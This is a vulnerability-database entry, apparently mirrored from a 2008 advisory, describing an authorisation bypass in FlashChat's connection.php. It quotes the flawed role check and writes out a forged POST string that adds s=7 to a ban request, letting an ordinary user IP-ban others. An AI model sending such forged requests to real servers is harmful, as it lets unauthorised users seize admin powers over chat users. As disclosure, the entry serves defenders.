Lucene search

flashchat-bypass.txt

🗓️ 17 Oct 2008 00:00:00Reported by eLiSiAType

packetstorm🔗 packetstormsecurity.com👁 16 Views

File connection.php allows user bypass role filtering and gain admin privileges by adding s=7 to post data string in getxml.ph

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`File: connection.php   
  
if(   
ChatServer::userInRole($this->userid, ROLE_ADMIN) ||   
ChatServer::userInRole($this->userid, ROLE_MODERATOR) ||  
($req['s'] == 7) <-- *bypass line*  
)  
  
  
This piece of code allows a normal user to bypass role filtering and to be granted admin role as a normal user. To exploit the vulnerability simply send to getxml.php, while into the chat, this post data string (for example intercepting and modifying a legal message packet sent to the server with tamper data plugin of firefox):  
  
for example to ban a user simply add the bypass to the normal ban string request:  
  
replace:  
//normal message sent to server thas has being intercepted  
sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id=  
  
with:  
//normal ban packet used by admins or mods  
sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id=  
  
//forged packet send by attacker  
sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=  
  
*note the s=7 added  
  
this will ip-ban user with id 5581 from chat.  
  
eLiSiA - 17-10-2008  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

17 Oct 2008 00:00Current

7.4High risk

Vulners AI Score7.4